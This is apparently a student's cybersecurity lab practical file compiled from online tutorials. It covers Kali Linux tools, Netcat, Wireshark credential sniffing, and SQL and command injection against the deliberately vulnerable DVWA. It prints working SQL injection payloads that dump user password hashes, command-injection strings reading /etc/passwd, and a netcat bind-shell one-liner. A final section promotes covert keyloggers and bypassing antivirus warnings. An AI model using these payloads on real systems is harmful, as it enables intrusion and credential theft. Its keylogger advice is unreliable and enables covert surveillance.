PRACTICAL – 1

Aim: Install Kali Linux. Examine the utilities and tools

available in Kali Linux and find out which toolis the best
for finding cyber attack/vulnerability.

Installing Kali Linux

Installing Kali Linux (single boot) on your computer is an easy process. This
guide will cover the basic install (which can be done on bare metal or guest
VM), with the option of encrypting the partition. At times, you may have
sensitive data you would prefer to encrypt using Full Disk Encryption (FDE).
During the setup process you can initiate an LVM encrypted install on either
Hard Disk or USB drives.

First, you’ll need compatible computer hardware. Kali Linux is supported on

amd64 (x86_64/64-Bit) and i386 (x86/32-Bit) platforms. Where possible,
we would recommend using the amd64 images. The hardware
requirements are minimal as listed in the section below, although better
hardware will naturally provide better performance. You should be able to
use Kali Linux on newer hardware with UEFI and older systems with BIOS.

Our i386 images, by default use a PAE kernel, so you can run them on
systems with over 4 GB of RAM.

In our example, we will be installing Kali Linux in a fresh guest VM, without
any existing operating systems pre-installed. We will explain other possible
scenarios throughout the guide.

System Requirements

The installation requirements for Kali Linux will vary depending on what you
would like to install and your setup. For system requirements:

 On the low end, you can set up Kali Linux as a basic Secure Shell
(SSH) server with no desktop, using as little as 128 MB of RAM (512 MB
recommended) and 2 GB of disk space.
 On the higher end, if you opt to install the default Xfce4 desktop and
the kali-linux-default metapackage, you should really aim for at least 2 GB
of RAM and 20 GB of disk space.
o When using resource-intensive applications, such as Burp
Suite, they recommend at least 8 GB of RAM (and even more if it large web
application!) or using simultaneous programs at the same time.

Installation Prerequisites

This guide will make also the following assumptions when installing Kali
Linux:

 Using the amd64 installer image.

 CD/DVD drive / USB boot support.
 Single disk to install to.
 Connected to a network (with DHCP & DNS enabled) which has
outbound Internet access.

We will be wiping any existing data on the hard disk, so please backup any
important information on the device to an external media.

Preparing for the Installation

1. Download Kali Linux (We recommend the image marked Installer).

2. Burn The Kali Linux ISO to DVD or image Kali Linux Live to USB
drive. (If you cannot, check out the Kali Linux Network Install).
3. Backup any important information on the device to an external media.
4. Ensure that your computer is set to boot from CD/DVD/USB in your
BIOS/UEFI.

Kali Linux Installation Procedure

Boot

1. To start your installation, boot with your chosen installation medium.

You should be greeted with the Kali Linux Boot screen. Choose
either Graphical install or Install (Text-Mode). In this example, we
chose the Graphical install.
Language

2. Select your preferred language. This will be used for both the setup
process and once you are using Kali Linux.

3. Specify your geographic location.

 4. Select your keyboard layout.

Network

5. The setup will now probe your network interfaces, looks for a DHCP
service, and then prompt you to enter a hostname for your system. In
the example below, we’ve entered kali as our hostname.
 If there isn’t a DHCP service running on the network, it will ask you to
manually enter the network information after probing for network
interfaces, or you can skip.
 If Kali Linux doesn’t detect your NIC, you either need to include the
drivers for it when prompted, or generate a custom Kali Linux ISO with
them pre-included.
 If the setup detects multiple NICs, it may prompt you which one to use
for the install.
 If the chosen NIC is 802.11 based, you will be asked for your wireless
network information before being prompted for a hostname.

6. You may optionally provide a default domain name for this system to
use (values may be pulled in from DHCP or if there is an existing
operating systems pre-existing).
User Accounts

7. Next, create the user account for the system (Full name, username
and a strong password).
Clock

8. Next, set your time zone.

Disk

9. The installer will now probe your disks and offer you various choices,
depending on the setup.

In our guide, we are using a clean disk, so we have four options to pick
from. We will select Guided - the entire disk, as this is the single boot
installation for Kali Linux, so we do not want any other operating systems
installed, so we are happy to wipe the disk.

If there is an pre-existing data on the disk, you will have have an extra
option (Guided - use the largest continuous free space) than the example
below. This would instruct the setup not to alter any existing data, which is
perfect for for dual-booting into another operating system. As this is not the
case in this example, it is not visible.

Experienced users can use the “Manual” partitioning method for more
granular configuration options, which is covered more in our BTRFS guide.

If you want to encrypt Kali Linux, you can enable Full Disk Encryption (FDE),
by selecting Guided - used entire disk and setup encrypted LVM. When
selected, later on in the setup (not in this guide) prompt you to enter a
password (twice). You will have to enter this password every time you start
up Kali Linux.
 10. Select the disk to be partitioned.

11. Depending on your needs, you can choose to keep all your files
in a single partition - the default - or to have separate partitions for
one or more of the top-level directories.

If you’re not sure which you want, you want “All files in one partition”.
12. Next, you’ll have one last chance to review your disk
configuration before the installer makes irreversible changes. After you
click Continue, the installer will go to work and you’ll have an almost
finished installation.
Encrypted LVM

If enabled in the previous step, Kali Linux will now start to perform a secure
wipe of the hard disk, before asking you for a LVM password.

Please sure a strong password, else you will have to agree to the warning
about a weak passphrase.

Proxy Information

13. Kali Linux uses a central repository to distribute applications.

You’ll need to enter any appropriate proxy information as needed.

Metapackages

14. Next you can select which metapackages you would like to install. The
default selections will install a standard Kali Linux system and you
don’t really have to change anything here.

Please refer to this guide if you prefer to change the default selections.

Boot Information

15. Next confirm to install the GRUB boot loader.

16. Select the hard drive to install the GRUB bootloader in (it does
not by default select any drive).
Reboot

17. Finally, click Continue to reboot into your new Kali Linux
installation.

Post Installation

Now that you’ve completed installing Kali Linux, it’s time to customize your
system.

The General Use section has more information and you can also find tips on
how to get the most out of Kali Linux in our User Forums.
  Introduction to Kali Linux tools list
 Kali Linux tools list is defined as a list of tools present in Kali Linux
distribution, which aids users to perform penetration testing and
understand that Kali Linux is the most recommended distribution for
ethical hackers around the world. But the utilization of the tool is just
not restricted to ethical hacking, but even for a webmaster, many of
these tools are equally efficient and worthy. These tools aid users in
penetration testing by enabling their task in testing, hacking or
anything which is part of digital forensics. No matter who is using the
tools or what specifics of utility space of the tools, the list we are going
to discuss here caters to the top tools in Kali Linux!

 List of Kali Linux tools and explanation of each:

 In Kali Linux, there are a bunch of tools that we will talk about comes
pre-installed. In case you don’t find the tools in the distribution pre-
installed, one can easily download the same and install it to easily use
it for the utility! We will make sure that the list we mention here takes
care of all the penetration testing cycle procedures, i.e.
Reconnaissance, scanning, Exploitation, post-exploitation. We will try
to focus on some important tools, as talking about all might be an
endless discussion due to the vastness of tools present. Without much
further ado, let us kickstart the list modelled into sub-groups in
accordance with their utilities.

1. Gathering Information
 TracerRoute: This is a utility in Kali Linux which enables users in
network diagnostic. It shows up the connection route and as well as
measures the delays in transit of the packets across an IP network.

 WhatWeb: This utility enables the utility of information gathering and

is like a website fingerprint. It is analogous to an interrogation agent
who tries to interrogate a website in getting answers to what that
website is built of. To help WhatWeb, there are 1800 plugins, each
having their own utility.
 Nmap: Another frequently used tool is Nmap that is used for network
discovery and auditing of security. Options are present, which notifies
of each open port available on the target.
 Dirbuster: As the name signifies, this tool is to bust hidden objects,
files or even directories present in a website. A dictionary-based attack
is launched with a set of preconfigured lists of words, and the response
is analyzed to find the hidden gem!
2. Analysis of Web Application

 SQLiv: This tool is one of the most common ones used for simple and
massive vulnerability scanner of SQL injection. This is one of the few
ones in the list that doesn’t come pre-installed in Kali Linux distribution
but is still the most widely used!
 BurpSuite: This is another addition to the web application analysis,
which itself comprises of a collection of tools that are bundled to form
a single suite of web application’s security testing starting from the
scratch, i.e. analysis of the attack surface.
 OWASP-ZAP: This is a Java based tool for testing the web
application’s security which promises an intuitive GUI to perform tasks
that include fuzzing, spidering, scripting etc., along with the presence
of a number of plugins to ease of the task in hand.

3. Analysis of Vulnerability

 Nikto: One of the common tools used for assessing vulnerability and

security threats. This tool has the capability to scan for 6500+ files or
programs, which can be potentially dangerous.

4. Password attacks

 Hash-identifier: This tool helps users in the identification of various

hashes that are used for the encryption of data and passwords. Along
with his tool, another tool named findmyhash is used for cracking the
data using online services. Let’s say we receive an encrypted text; it is
put through hash-identifier to figure out the hash type attached to it
and then later findmyhash cracks the data to its original string.
 Crunch: This tool is like a utility that allows users to create custom
wordlists. With a standard character set or with a specified one, all
sort of permutation and combination is generated for the utility of
password attacks.
 John the Ripper: Another widely used offline password cracking
service that combines a lot of password crackers into a single package.
It takes care of identifying the hash type, customization cracker and
many such more and that too in offline mode
5. Assessing Database

 SQLMap: This is one of the most widely used tools for database

assessment as the process of detection and exploitation of
vulnerabilities present in SQL injection, which can lead to taking over
of database. For carrying on with this, we might need to find a website
that is SQL injection vulnerable, for which another tool discussed
above, SQLiv, will come in handy!

6. Wireless attack

 Aircrack-NG suite: As the name suggests that this is a suite, a

scanner, WEP and WPA/WPA2-PSK cracker, a packet sniffer and an
analysis tool is threaded together to carry out tasks to crack or identify
vulnerabilities in any wireless mediums! This tool consists of 16 sub-
tools to carry on with the utility.
 Fluxion: This is like the creation of a clone of the target Wi-Fi
network. Now when a user connects to the wireless network, an
authentication window pops up, and the user enters the password,
which is then captured henceforth!

7. Spoofing & Sniffing

 Wireshark: This is another great and widely used network analyzer

tool for auditing security. Wireshark performs general packet filtering
by using display filters, including the one to grab a captured password.
 BetterCAP: Another great tool for performing man in the middle
attacks against a network. This is achieved by manipulation of HTTP,
HTTPS, TCP traffic in real-time, credential sniffing and many such
more to carry out such attacks!

8. Keeping anonymity

 MacChanger: When one is performing the different tasks mentioned

above, we must make sure that our identity is not disclosed, and it will
just be foolish if any prevention is overlooked. This tool enables
changing of the user’s MAC address so as to keep the identity
anonymous!
 PRACTICAL – 2
Aim: Evaluate network defense tools for following (i) IP spoofing
(ii) DIifference between DDOS attack & DOS attack.

(i)IP Spoofing

IP Spoofing is essentially a technique used by a hackers to gain

unauthorized access to Computers. Concepts of IP Spoofing was initially
discussed in academic circles as early as 1980. IP Spoofing types of
attacks, had been known to Security expert on the theoretical level. It was
primarily theoretical until Robert Morris discovered a security weakness in
the TCP protocol known as sequence prediction. Occasionally IP spoofing is
done to mask the origins of a Dos attack. In fact Dos attacks often mask
actual IP address from where attack has originated from.

Process :
With IP spoofing, intruder sends message to a computer system with an IP
address indicating message is coming from a different IP address than its
actually coming from. If intent is to gain unauthorized access, then Spoof
IP address will be that of a system the target considers a trusted host. To
Successfully perpetrate an IP Spoofing attack, hacker must find IP address
of a machine that the target System Considers a trusted source. Hackers
might employ a variety of techniques to find an IP address of a trusted
host. After they have obtained trusted IP address they can then modify
packet headers of their transmission so its appears that the packet coming
from the host.

Different ways to address IP Spoofing include :

1. Do not reveal any information regarding your internal IP

addresses.This helps prevent those addresses from being “spoofed”.
2. Monitor incoming IP packets for signs of IP spoofing using network
monitoring software. One popular product is “Netlog”, is along side
similar products, seeks incoming packets to the external interface that
have the both source and destination IP addresses in your local domain.
This essentially means an incoming packet that claims to be from inside
network is actually coming from outside your network. Finding one
means that an attack is underway.
Danger that IP spoofing contains is that some firewalls do not examine
packets that appear to come from an internal IP address.Routing packets
through filtering router is possible, if they are not configured to filter
incoming packets whose source address is in local domain.

Examples of router configurations that are potentially

vulnerable include :

1. Routers to external networks that support multiple internal interfaces.

2. Proxy firewalls where the proxy applications use source IP address for
authentication.
3. Router with two interfaces support sub-netting on the internal
network.
4. Routers that do not filter packets whose source address is in the local
domain.

(ii) Difference between DOS and DDOS attack

DOS
DOS stands for Denial Of Service
attack.
DOS attack single system targets the
victim system.
DOS attack is slower than DDOS
attack.
It can be blocked easily as only one
system is used.
In DDOS attack,only single device is
used with DOS attack tools.
DOS attack are easy to trace.
Volume of traffic on DOS attack is
less as compared to DDOS.
Types of DOS attacks are:
1.Buffer overflow attacks
2.Ping of Death or ICMP flood
DDOS
DDOS stands for Distributed Denial
Of Service attack.
In DDOS multiple systems attacks
the victim system.
DDOS attack is faster than DOS
attack.
It is difficult to block this attack as
multiple devices are sending packets
and attacking from multiple
locations.
In DDOS attack,Bots are used to
attack at the same time.
DDOS attacks are difficult to trace.
DDOS attacks allow the attacker to
send massive volumes of traffic to
the victim network.
Types of DDOS attacks are:
1.Volumetric attacks
2.Fragmentation attacks
 3.Teardrop attack 3.Application layer attacks
Victim PC is loaded from the packet Victim PC is loaded from the packet
of data sent from a sender location. of data send from multiple location.

Conclusion :

1. IP spoofing attacks are becoming less frequent.

2. Primarily because the Venues they use have become more Secure
and in some case no longer used.
3. Spoofing can still be used and all security administrators should
address it.
 PRACTICAL – 3
Aim:Explore the Nmap tool and list how it can be used for
network defence

NMAP/ZenMap :

Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform

(Linux, Windows, Mac OS X, BSD, etc.) free and open source application
which aims to make Nmap easy for beginners to use while providing
advanced features for experienced Nmap users. Frequently used scans can
be saved as profiles to make them easy to run repeatedly. A command
creator allows interactive creation of Nmap command lines. Scan results can
be saved and viewed later. Saved scan results can be compared with one
another to see how they differ. The results of recent scans are stored in a
searchable database.

How it works :

You can install zenmap using the following apt-get command:

It sends commands to the platform-specific nmap executable and pipes the
output back. Zenmap makes it easy to build out command line options like
this.

It ships with some handy pre-set profiles, such as Intense scan, which scans
hosts with “all advanced/aggressive options,” Quick scan, which scans hosts
without those advanced options, and Slow comprehensive scan, which is
exactly as it sounds.
Type the following command to start zenmap:
 Defining a target :-

 Every scan must be associated to a specific target, which can be a

single host, an interval range of hosts, or a full subnet. You can do a
network ip range scan like, by specifying target as :
 https://www.linkedin.com/redir/invalid-link-page?
url=192%2e168%2e233%2e0%2F24

 Reporting window :- Zenmap provides different tabs for reporting on

scan results.

 Profile :- Frequently used scans can be saved as profiles to make

them easy to run repeatedly.

 Scan :- To initiate scan based on current configuration as displayed on

GUI window.

 Command :- Not a fan of command line tools? Command creator

allows interactive creation of Nmap command lines.

Useful tools :

The Compare Results tool provides an interface for differentiating between

two scans, which can be used to monitor daily changes in network topology
or available hosts.
 Saving scans
This comes in handy when you perform a large scan and do not want to
repeat the scan again later while reviewing results.
 A sample XML report generated by Zenmap
Custom profiles :

The Profile Editor window contains the following tabs:

 Profile : The name and description of your profile

 Scan : The most important tab, where you can specify targets, scan
type (TCP, UDP, IP), timing template, and much more

 Ping : Specifies ping behaviour. You can suppress pings or build a

specific ICMP packet

 Scripting : Include nmap scripts in your scan. Zenmap comes with

many useful scripts

 Target : Allows for greater target specification flexibility, including

excluded hosts, target list files, and fast scan support

 Source : Specify how you would like the scanner to behave with
respect to scanning identity, IP address, port, and interface

 Other : Includes options for verbosity level, TTL, and other scanner
behaviours
 Timing : Defines timing profile with respect to maximum scan time,
scan delay, and timeouts, among other things
Using saved profiles also ensures that when comparing two scan results you
are working from the same scan options. One of my favorite option in
Source tab is to use decoys to hide identity. Decoys lessens the chances of
being caught and does it even better when used in conjunction with IP
spoofing (also available in source tab).

Use the Profile Editor to develop custom profiles that meet your enterprise
needs
 PRACTICAL - 4
Aim: Explore the NetCat tool.
Netcat is a great network utility for reading and writing to network
connections using the TCP and UPD protocol. Netcat is often referred to as
the Swiss army knife in networking tools and we will be using it a lot
throughout the different tutorials on Hacking Tutorials. Most common use for
Netcat when it comes to hacking is setting up reverse and bind shells, piping
and redirecting network traffic, port listening, debugging programs and
scripts and banner grabbing. In this tutorial we will be learning how to use
the basic features from Netcat such as:
 Banner grabbing
 Raw connections
 Webserver interaction
 File transfers

We will demonstrate these techniques using a couple virtual machines

running Linux and through some visualization.
Banner Grabbing, raw connections and webserver
interaction :

Service banners are often used by system administrators for inventory

taking of systems and services on the network. The service banners identify
the running service and often the version number too. Banner grabbing is a
technique to retrieve this information about a particular service on an open
port and can be used during a penetration test for performing a vulnerability
assessment. When using Netcat for banner grabbing you actually make a
raw connection to the specified host on the specified port. When a banner is
available, it is printed to the console. Let’s see how this works in practice.
Netcat banner grabbing :

The following command is used the grab a service banner (make a raw
connection to a service):

Let’s try this on the FTP service on Metasploitable 2 which is running on port
21:
As we can see there is a vsFTPD service running on port 21. Have a look at
the service enumeration tutorial if you want to learn more about this subject
Netcat raw connection :

To demonstrate how a raw connection works we will issue some FTP

commands after we’re connected to the target host on the FTP service. Let’s
see if anonymous access is allowed on this FTP server by issuing the USER
and PASS command followed by anonymous.

This example demonstrates how to grab a banner and how to setup and use
a raw data connection. In this example we’ve used an FTP service but this
also works on other services such as SMTP and HTTP services.
Web server interaction :

Netcat can also be used to interact with webservers by issuing HTTP

requests. With the following command we can grab the banner of the web
service running on Metasploitable 2:
And then run this HTTP request:

The webserver responds with the server banner: Apache/2.2.8 (Ubuntu)

DAV/2 and the PHP version.
To retrieve the top level page on the webserver we can issue the following
command:

And then run this HTTP request:

File transfers with Netcat :

In this example we will be using a Netcat connection to transfer a text file.

Let’s assume we have remote command execution on the target host and we
want to transfer a file from the attack box to the host. First we would need
to set up a listener on the target host and connect to it from the attack box.
We will be using port 8080 for this purpose and we safe the file to the
desktop:
As we can see here the contents of the files are equal which means it has
been transferred from the attack box to the target host.
Conclusion :

In the first part of the Hacking with Netcat tutorials we have learned how to
work with several basic features like raw connections, banner grabbing and
file transfers. We have learned how to grab service banners which contain
information about the service running on the specific port. We have also
learned how to interact with services by using raw connections and Netcat.
In the tutorial we have gained anonymous access to a FTP server using a
raw data connection and issued some FTP commands. We have also learned
how to use Netcat for interaction with a webserver. We are able to retrieve
webpages and send HTTP requests. Last but not least, we have learned how
to transfer files from one box to another with Netcat.
 PRACTICAL – 5
Aim: Use Wireshark tool and explore the packet format and
content at each OSI layer.

Wireshark is the world’s foremost network protocol analyzer. It lets you see
what’s happening on your network at a microscopic level. It is the de facto
(and often de jure) standard across many industries and educational
institutions.
This tutorial can be an angel and also devil in the same time, it depends to
you who use this tutorial for which purpose…me as a writer of this tutorial
just hope that all of you can use it in the right way , because I believe that
no one from you want your password sniffed by someone out there so don’t
do that to others too
Disclaimer :-

Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning
new skills, we only recommend that you test this tutorial on a system that belongs to
YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to
use this to attempt to hack systems that do not belong to you.

Requirements :
 Wireshark Network Analyzer (wireshark.org)

 Network Card (Wi-Fi Card, LAN Card, etc) FYI : for wi-fi it should
support promiscious mode

Step 1 :

Start Wireshark and capture traffic

In Kali Linux you can start Wireshark by going to

Application > Kali Linux > Top 10 Security Tools >

Wireshark

In Wireshark go to Capture > Interface and tick the interface that applies

to you. In my case, I am using a Wireless USB card, so I’ve selected wlan0.
Ideally you could just press Start button here and Wireshark will start
capturing traffic. In case you missed this, you can always capture traffic by
going back to

Step 2 :

Filter captured traffic for POST data

At this point Wireshark is listening to all network traffic and capturing them.
I opened a browser and signed in a website using my username and
password. When the authentication process was complete and I was logged
in, I went back and stopped the capture in Wireshark.
when wee type in your username, password and press the Login button, it
generates a a POST method (in short – you’re sending data to the remote
server).
To filter all traffic and locate POST data, type in the following in the filter
section
http.request.method == “POST”
See screenshot below. It is showing 1 POST event.
Step 3 :

Analyze POST data for username and password Now right click on that line and select
Follow TCP Steam

This will open a new Window that contains something like this:
So in this case,
username: sampleuser
password: e4b7c855be6e3d4307b8d6ba4cd4ab91
But hold on, e4b7c855be6e3d4307b8d6ba4cd4ab91 can’t be a real
password. It must be a hash value.
to crack this password its simple just open new terminal window and type
this :

and its looks like this:

username: sampleuser
password: e4b7c855be6e3d4307b8d6ba4cd4ab91:simplepassword

Conclusion:

Wireshark is a great piece of free open source software for network

monitoring and it is a fantastic packet sniffer. It was created by Gerald
Combs a computer science graduate during his education period. In late
1990’s it was known as Ethereal which was used to capture and analyse
packets.
 PRACTICAL – 7

Aim: Examine SQL injection attack.

What is SQL injection (SQLi)?

SQL injection is one of the most common attacks used by hackers to exploit
any SQL database-driven web application. It’s a technique where SQL
code/statements are inserted in the execution field with an aim of either
altering the database contents, dumping useful database contents to the
hacker, cause repudiation issues, spoof identity, and much more.
Let’s take a simple scenario where we have a web application with a login
form with username and password fields. If the developer used PHP for
development, the code would look like this:

If a user  Karen  with the password ‘ 12345 ’ wanted to log in, after clicking
the Submit or the Log in button, the query that would be sent to the
database would look like this:

If an attacker knew the username and wanted to bypass the login window,
they would put something like  Karen;--  in the username field. The resulting
SQL query would look like this:

What the attacker has done, is adding the -- (double-dash) which comments

the rest of the SQL statement. The above query will return the information
entered in the password field making it easier for the attacker to bypass the
login screen.
 
How to prevent SQL injection
The main reason that makes websites vulnerable to SQL injection attacks
can be traced back to the web development stage. Some of the techniques
that can be implemented to prevent SQL injection include:
 Input validation: If the website allows user input, this input should be
verified whether it’s allowed or not.
 Parametrized queries: This is a technique where the SQL statements
are precompiled and all you have to do is supply the parameters for
the SQL statement to be executed.
 Use Stored procedures
 Use character-escaping functions
 Avoid administrative privileges - Don't connect your application to the
database using an account with root access
 Implement a Web application firewall (WAF)
Any penetration tester who wants to get started or advance their skills in
SQL injection will need a vulnerable platform to practice. There are many
vulnerable applications available both for offline and online use.
In this particular tutorial, we will focus on the Damn Vulnerable Web
Application (DVWA).
Pre-requisites
This tutorial expects that you have an up and running DVWA setup. If you
have not yet installed DVWA on your Kali Linux system, please check out the
article which gives a step-by-step guide.
 

Step 1: Setup DVWA for SQL Injection

After successfully installing DVWA, open your browser and enter the required
URL  127.0.0.1/dvwa/login.php  Log in using the username “admin” and
password as “password”. These are the default DVWA login credentials. After
a successful login, set the DVWA security to LOW then click on SQL Injection
on the left-side menu.
Step 2: Basic Injection
On the User ID field, enter “1” and click Submit. That is supposed to print
the ID, First_name, and Surname on the screen as you can see below.
The SQL syntax being exploited here is:

Interestingly, when you check the URL, you will see there is an injectable
parameter which is the ID. Currently, my URL looks like this:
Let’s change the ID parameter of the URL to a number like 1,2,3,4 etc. That
will also return the  First_name  and  Surname  of all users as follows:

If you were executing this command directly on the DVWA database, the
query for User ID 3 would look like this:

Step 3: Always True Scenario

An advanced method to extract all the First_names and Surnames from the
database would be to use the input: %' or '1'='1'
The percentage  %  sign does not equal anything and will be false.
The  '1'='1'  query is registered as True since 1 will always equal 1. If you
were executing that on a database, the query would look like this:

Step 4: Display Database Version

To know the database version the DVWA application is running on, enter the
text below in the User ID field.
The database version will be listed under surname in the last line as shown
in the image below.

Step 5: Display Database User

To display the Database user who executed the PHP code powering the
database, enter the text below in the USER ID field.

The Database user is listed next to the surname field in the last line as in the
image below.
Step 6: Display Database Name
To display the database name, we will inject the SQL code below in the User
ID field.

The database name is listed next to the surname field in the last line.
Step 7: Display all tables in information_schema
The Information Schema stores information about tables, columns, and all
the other databases maintained by MySQL. To display all the tables present
in the information_schema, use the text below.
Step 8: Display all the user tables in information_schema
For this step, we will print all the tables that start with the prefix user as
stored in the information_schema. Enter the SQL code below in the User ID.

%' and 1=0 union select null, table_name from information_schema.tables where table_name like

'user%'#
Step 9: Display all the columns fields in the
information_schema user table
We will print all the columns present in the users’ table. This information will
include column information like User_ID, first_name, last_name, user, and
password. Enter the input in the User_ID field.

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from

information_schema.columns where table_name = 'users' #

Step 10: Display Column field contents
To display all the necessary authentication information present in the
columns as stored in the information_schema, use the SQL syntax below:

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from

users #
From the image above, you can see the password was returned in its hashed
format. To extract the password, copy the MD5 hash and use applications
like John the Ripper to crack it. There are also sites available on the internet
where you can paste the hash and if lucky, you will be able to extract the
password.
 

Conclusion:
From the various examples listed in this article, SQL injection proves to be a
critical vulnerability that can exist in a system. Not only can attackers exploit
it to reveal user or customer information, but it can also be used to corrupt
the entire database thus bringing the whole system down. As of writing this
post (2021), Injection is listed as the number one vulnerability in the OWASP
Top 10 Vulnerabilities summary. The DVWA acts as a reliable resource for
both penetration testers who want to improve their skills and web
developers who want to develop systems with security in mind.
 PRACTICAL - 8
Aim: Examine Command Execution attack in DVWA
Command Execution or Command injection is an attack in which the goal is
execution of arbitrary commands on the host operating system via a
vulnerable application. Command injection attacks are possible when an
application passes unsafe user supplied data (forms, cookies, HTTP headers
etc.) to a system shell.

Low

if we check the source code for low

we can see that the code does not check if $target matches an IP Address.
No filtering on special characters. ; in Unix/Linux allows for commands to be
separated. 127.0.0.1; ls -la /root - list all the files in the root directory :
127.0.0.1 ; cat /etc/passwd | tee /tmp/passwd - Displays the contents of
/etc/passwd on the webpage and also copies the contents of /etc/passwd file
to the /tmp directory.

Alternatives to ;

&& - AND Operator

| - PIPE Operator - Completely removes IP address from output.

Medium

Viewing source code:

we see that a blacklist has been set to exclude && and ; . As noted above,
we can use | as a replacement:

127.0.0.1| cat /etc/passwd . Double || can also be used,

High

Viewing source code, more extensive blacklist has been set. Slightly trickier,
however the answer is in the view source , '| ' => '', - note that there is a
space after the | character. If we try | pwd , no output is returned, however
if we use |pwd we are including our command within this space, as shown
below:
Bind Shell

192.168.1.147; /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe - Creates a

netcat listener, then use nc 192.168.1.147 4444 to connect. (Change IP
addresses to match those of target machine)

Points to note:

1. Ensure you are using commands specific to the target you are trying to
attack, all of the above are Linux, Windows commands will be different.

2. Try commands with and without a space between them 3. You will not
always have access to the source code. OWASP:

https://www.owasp.org/index.php/Testing_for_Command_Injection_(O TG-
INPVAL-013)
 PRACTICAL-9

Aim: Examine software keyloggers and hardware keyloggers

What is a keylogger?

It’s something that records keystrokes and is normally used without the
consent of the user.

You’ve probably heard that keyloggers are a bad thing. It is when used for
illegal purposes, such as having a keylogger app installed without your
knowledge via spyware. But it’s not a bad thing when you are the one who
installed it to keep track of what people are doing when using your
computer. For example, if you’re a parent who thinks your child is doing not-
so-good things on the internet, you’ll be able to find out what’s been going
on with a keylogger.

If you decide to use one, you can opt to use hardware or software.

Hardware

Above is a hardware keylogger from ThinkGeek. It connects directly to the

keyboard connector, can be hidden easily and holds up to 128k of data.
While that may not sound like much, bear in mind it’s all text so it is actually
quite a bit. Additional features include password protection and keyword
searching.

The only real drawback is that it is, as you can see, a PS/2 connector and
not USB. However that can be easily remedied with an adapter should you
use USB.

Cost is $59.99

There are other hardware-based keyloggers out there on the internet, just
do a search for them and they’ll show up.
Software

You need not look any further than SourceForge to find freely available
keylogging applications for Windows and Linux.

Best Free Keylogger, a.k.a. BFK, is one of the better ones.

Bear in mind you do have to set up appropriate permissions for this app, and
if you use existing spyware/malware security software it may identify this
app as “dangerous”. Obviously it isn’t, so if you see the warning(s), give the
app the appropriate security “pass”.

Which is better, hardware or software?

Hardware is the better of the two because it’s not an app you can simply
disable as it requires no software. The only way to disable the hardware is to
literally unplug it.

Will either slow down my computer?

No. Either will run in the background seamlessly.